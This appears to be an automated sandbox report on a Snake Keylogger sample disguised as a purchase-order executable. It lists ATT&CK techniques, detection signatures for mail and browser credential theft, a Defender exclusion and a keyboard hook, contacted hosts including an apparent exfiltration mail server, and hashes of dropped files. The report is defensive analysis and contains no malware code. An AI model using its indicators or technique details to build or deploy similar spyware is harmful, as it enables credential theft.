                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1409106 Sample: PUK ITALIA PO 120610549.EXE.exe Startdate: 14/03/2024 Architecture: WINDOWS Score: 100 29 mail.alltoursegypt.com 2->29 31 api.ipify.org 2->31 33 alltoursegypt.com 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Sigma detected: Scheduled temp file as task from temp location 2->43 45 11 other signatures 2->45 8 PUK ITALIA PO 120610549.EXE.exe 15 6 2->8         started        13 FNOqSQ.exe 3 2->13         started        signatures3 process4 dnsIp5 35 alltoursegypt.com 192.254.186.165, 49733, 49736, 587 UNIFIEDLAYER-AS-1US United States 8->35 37 api.ipify.org 104.26.12.205, 443, 49732 CLOUDFLARENETUS United States 8->37 25 C:\Users\user\AppData\Roaming\FNOqSQ.exe, PE32 8->25 dropped 27 C:\Users\user\AppData\Local\...\tmpEADA.tmp, XML 8->27 dropped 47 Tries to steal Mail credentials (via file / registry access) 8->47 49 Tries to harvest and steal browser information (history, passwords, etc) 8->49 51 Adds a directory exclusion to Windows Defender 8->51 53 Installs a global keyboard hook 8->53 15 powershell.exe 23 8->15         started        17 schtasks.exe 1 8->17         started        55 Multi AV Scanner detection for dropped file 13->55 file6 signatures7 process8 process9 19 WmiPrvSE.exe 15->19         started        21 conhost.exe 15->21         started        23 conhost.exe 17->23         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    PUK ITALIA PO 120610549.EXE.exe66%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\FNOqSQ.exe66%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                    http://r3.i.&0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                    http://r3.i.lencr.org/010%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                    http://www.itcfonts.b0%Avira URL Cloudsafe
                    http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      high
                      alltoursegypt.com
                      192.254.186.165
                      truefalse
                        unknown
                        mail.alltoursegypt.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://r3.i.&PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.apache.org/licenses/LICENSE-2.0PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bThePUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://account.dyn.com/PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.comPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cThePUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://r3.i.lencr.org/01PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4130479003.000000000AD20000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.ipify.orgPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-user.htmlPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.c.lencr.org/0PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://x1.i.lencr.org/0PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://r3.o.lencr.org0PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000006FED000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4130479003.000000000AD20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/DPleasePUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.itcfonts.bPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126180855.00000000058D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers8PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fonts.comPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.krPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.urwpp.deDPleasePUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.zhongyicts.com.cnPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sakkal.comPUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4126343277.0000000006A62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://cps.root-x1.letsencrypt.org0PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4127344664.0000000007036000.00000004.00000020.00020000.00000000.sdmp, PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.26.12.205
                                                      api.ipify.orgUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      192.254.186.165
                                                      alltoursegypt.comUnited States
                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1409106
                                                      Start date and time:2024-03-14 17:28:08 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 15s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:PUK ITALIA PO 120610549.EXE.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@9/9@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 203
                                                      • Number of non-executed functions: 21
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • VT rate limit hit for: PUK ITALIA PO 120610549.EXE.exe
                                                      TimeTypeDescription
                                                      16:28:59Task SchedulerRun new task: FNOqSQ path: C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      17:28:56API Interceptor7733906x Sleep call for process: PUK ITALIA PO 120610549.EXE.exe modified
                                                      17:28:58API Interceptor14x Sleep call for process: powershell.exe modified
                                                      17:29:00API Interceptor1x Sleep call for process: FNOqSQ.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.26.12.205SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                      • api.ipify.org/
                                                      lods.cmdGet hashmaliciousRemcosBrowse
                                                      • api.ipify.org/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.18312.29680.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                      • 172.67.74.152
                                                      Details And Invoices.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      Salary_receipt.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      509656.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      6WMFyWEJ9J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      TT_payment_swift_copy_#11-03-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      509656.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      Delivery note.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      Delivery Information.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.74.152
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSIN___T9ZEKNFSIJ.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.0.231
                                                      IN___5MYRECKOVB.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 172.67.68.212
                                                      IN___8M7I46QFXP.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 172.67.68.212
                                                      europe.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      IN___ODZ4JE3VG1.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.0.231
                                                      IN___502HUSMW9N.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.1.231
                                                      https://seosuccesslab.com/Get hashmaliciousUnknownBrowse
                                                      • 104.21.59.139
                                                      https://8acs9yh98-frosty-disk-c127.emeraldfredia.workers.dev/#davide.sgariboldi@euroitalia.itGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                      • 104.16.123.96
                                                      INVOICE31401001340.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.70.15
                                                      http://shortens.meGet hashmaliciousUnknownBrowse
                                                      • 104.22.25.131
                                                      UNIFIEDLAYER-AS-1USInstruction.pdf.lnkGet hashmaliciousUnknownBrowse
                                                      • 162.214.80.55
                                                      NEW ORDER 98540-0.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.139.143
                                                      https://cdn.discordapp.com/attachments/1213770114223046679/1217601726979244064/Purchase.js?ex=66049ef9&is=65f229f9&hm=78f5764b16d6d27e20b2688112ea3defcedad34808d12d6c03f8e77c31bc9736&Get hashmaliciousAgentTeslaBrowse
                                                      • 192.185.103.198
                                                      Delivery note.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 162.240.109.7
                                                      CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                      • 50.87.223.209
                                                      https://www.vipulcopper.com/Get hashmaliciousUnknownBrowse
                                                      • 69.49.234.35
                                                      https://prezi.com/i/view/NEzvDMiy71AZ2uVfaGcJGet hashmaliciousUnknownBrowse
                                                      • 192.185.198.153
                                                      wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                      • 192.185.16.114
                                                      5059367692.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 50.87.253.239
                                                      https://www.eventcreate.com/e/rfp-reference-recommendatioGet hashmaliciousUnknownBrowse
                                                      • 50.116.87.174
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eIN___T9ZEKNFSIJ.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.12.205
                                                      IN___5MYRECKOVB.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.12.205
                                                      IN___8M7I46QFXP.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.12.205
                                                      europe.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      IN___ODZ4JE3VG1.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.12.205
                                                      IN___502HUSMW9N.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                      • 104.26.12.205
                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.PWSX-gen.18312.29680.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      doc.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                      • 104.26.12.205
                                                      No context
                                                      Process:C:\Users\user\AppData\Roaming\FNOqSQ.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.380805901110357
                                                      Encrypted:false
                                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:lGLHyIFKL3IZ2KRH9Ougos
                                                      MD5:F84E6CDD505CFBCB0494097AFA246090
                                                      SHA1:53F24F126D2E680CCABE29CFD47BE33B1D41E994
                                                      SHA-256:0697545568ECEF0194E6EBA21C31AD3297E226DF4B4AFCD8AD77223CB3D08887
                                                      SHA-512:5B8F240E4251B7C8B1F5623E76462AB02A13141E5141D9BBA3EBC95169EE9C28958FD1DCA7D9FF5D7FD30207E5457297C1C291DF3DD215EAA7FFE922A1DCF49D
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1572
                                                      Entropy (8bit):5.114928064253325
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaRxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTCv
